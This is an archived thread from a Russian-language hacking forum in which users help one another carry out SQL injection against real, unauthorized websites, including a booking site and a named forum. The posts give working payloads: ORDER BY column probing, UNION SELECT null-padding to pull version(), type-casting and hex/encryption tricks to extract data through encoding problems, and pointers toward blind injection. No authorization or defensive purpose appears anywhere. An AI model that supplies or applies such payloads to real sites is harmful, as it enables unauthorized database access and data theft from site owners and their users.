ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
19.10.2010, 00:40
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме:
556476
Репутация:
66
|
|
Сообщение от B1t.exe
B1t.exe said:
В одном сайте при бронирование номера вылез такое дело:
Это уязвимость ? (и вообше что это такое? )
видимо ваф ругался или скрипт неправильно обрабатывал запросы
|
|
|
19.10.2010, 12:04
|
|
Познающий
Регистрация: 06.06.2008
Сообщений: 76
Провел на форуме:
117639
Репутация:
55
|
|
YuNi|[c запрос ограничен по количеству символов, а сам пытался крутить этот сайт
Сообщение от None
AND ( user_master.user_registered_as = '1'' )
вот тут скуль, но больше 5 символов не вставить.
попробуй post передать 1' order by 10/* и увидишь результат
Сообщение от None
AND ( user_master.user_registered_as = '1' orde' )
сам голову долго ломал над этим
|
|
|
|
19.10.2010, 13:43
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме:
556476
Репутация:
66
|
|
Сообщение от durito
durito said:
YuNi|[c
запрос ограничен по количеству символов, а сам пытался крутить этот сайт
вот тут скуль, но больше 5 символов не вставить.
попробуй post передать 1' order by 10/* и увидишь результат
сам голову долго ломал над этим
ну вообше то я и постом отправлял все и 1' order by 10/* тоже пробовал ничего ((
Да там отрезает энное кол символов но тут скул очевиден и вот пробую разные варианты. Пока не пофиксили но и решение тоже нету ((
|
|
|
|
19.10.2010, 23:56
|
|
Новичок
Регистрация: 09.02.2009
Сообщений: 23
Провел на форуме:
51759
Репутация:
-9
|
|
есть сайт, на нем 100% SQL уязвимость,знаю точно ,что число колонок 10, union select Не выводит не чего, ошибки не выдает на
http://www.site.ru/index.php?id=36+union+select+1,2,3,4,5,6,7,8,9,10
но и не выводит не чего...
|
|
|
|
20.10.2010, 00:10
|
|
Новичок
Регистрация: 29.04.2010
Сообщений: 19
Провел на форуме:
58603
Репутация:
3
|
|
Подскажите, где скачать скрипты для sql blind injection... когда-то качал с форума, сча не найду никак))
|
|
|
|
20.10.2010, 00:20
|
|
Участник форума
Регистрация: 30.10.2009
Сообщений: 103
Провел на форуме:
736224
Репутация:
388
|
|
2KREGI,
Сообщение от None
есть сайт, на нем 100% SQL уязвимость,знаю точно ,что число колонок 10, union select Не выводит не чего, ошибки не выдает на
http://www.site.ru/index.php?id=36+union+select+1,2,3,4,5,6,7,8,9,10
но и не выводит не чего...
пробуй как blind sql inj, но вообще лучше бы линк кинул сюда |
|
|
|
20.10.2010, 00:25
|
|
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
Провел на форуме:
2212846
Репутация:
56
|
|
Сообщение от KREGI
KREGI said:
есть сайт, на нем 100% SQL уязвимость,знаю точно ,что число колонок 10, union select Не выводит не чего, ошибки не выдает на
http://www.site.ru/index.php?id=36+union+select+1,2,3,4,5,6,7,8,9,10
но и не выводит не чего...
Попробуй так
http://www.site.ru/index.php?id=-36+union+select+null,null,null,null,null,null,null ,null,null,null
http://www.site.ru/index.php?id=-36+union+select+null,null,null,null,null,version() ,null,null,null,null
Возможные варианты:
- не соответствует кодировка или тип данных.
Тогда, пользуйся функциями приведения типов
convert(version(),binary)
convert(version()+using+latin1)
convert(version()+using+binary)
cast(version()+as+binary)
cast(version()+as+int)
cast(version()+as+char)
и тд.
Ну или шифруй и расшифровывай данные на ходу, тогда они вернутся уже в нужной кодировке
aes_decrypt(aes_encrypt(version(),1),1)
unhex(hex(version()))
Многие базы, в отличии от MySQL, чувствительны к типу данных, например PostgreSQL.
- у скули нету вывода.
|
|
|
|
20.10.2010, 00:32
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме:
556476
Репутация:
66
|
|
Redwood ты тоже посмотри на мои варианты может у тя что получится
/threadnav46016-1536-10.html
|
|
|
|
20.10.2010, 08:28
|
|
Познающий
Регистрация: 29.08.2009
Сообщений: 75
Провел на форуме:
315861
Репутация:
5
|
|
http://veer[antigoogle]mirov.ru/forum/?f=1&p='
Помогите. явная скуля.
|
|
|
|
20.10.2010, 10:23
|
|
Новичок
Регистрация: 09.02.2009
Сообщений: 23
Провел на форуме:
51759
Репутация:
-9
|
|
Сообщение от Redwood
Redwood said:
Попробуй так
http://www.site.ru/index.php?id=-36+union+select+null,null,null,null,null,null,null ,null,null,null
http://www.site.ru/index.php?id=-36+union+select+null,null,null,null,null,version() ,null,null,null,null
Возможные варианты:
- не соответствует кодировка или тип данных.
Тогда, пользуйся функциями приведения типов
convert(version(),binary)
convert(version()+using+latin1)
convert(version()+using+binary)
cast(version()+as+binary)
cast(version()+as+int)
cast(version()+as+char)
и тд.
Ну или шифруй и расшифровывай данные на ходу, тогда они вернутся уже в нужной кодировке
aes_decrypt(aes_encrypt(version(),1),1)
unhex(hex(version()))
Многие базы, в отличии от MySQL, чувствительны к типу данных, например PostgreSQL.
- у скули нету вывода.
я пробовал по разному, если http://www.site.ru/index.php?id=-36+union+select+null,null,null,null,null,null,null ,null,null,null
http://www.site.ru/index.php?id=-36+union+select+null,null,null,null,null,version() ,null,null,null,null
то показывает абракадабру.
функции приведения типов не дали не чего...
что делать если у скули нет вывода?
blind sql inj вроде работает, определил версию...но вывести через нее ,как я не понял
|
|
|
|
|
|
|
|
Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
|
|
|
|
Похожие темы
Линейный вид
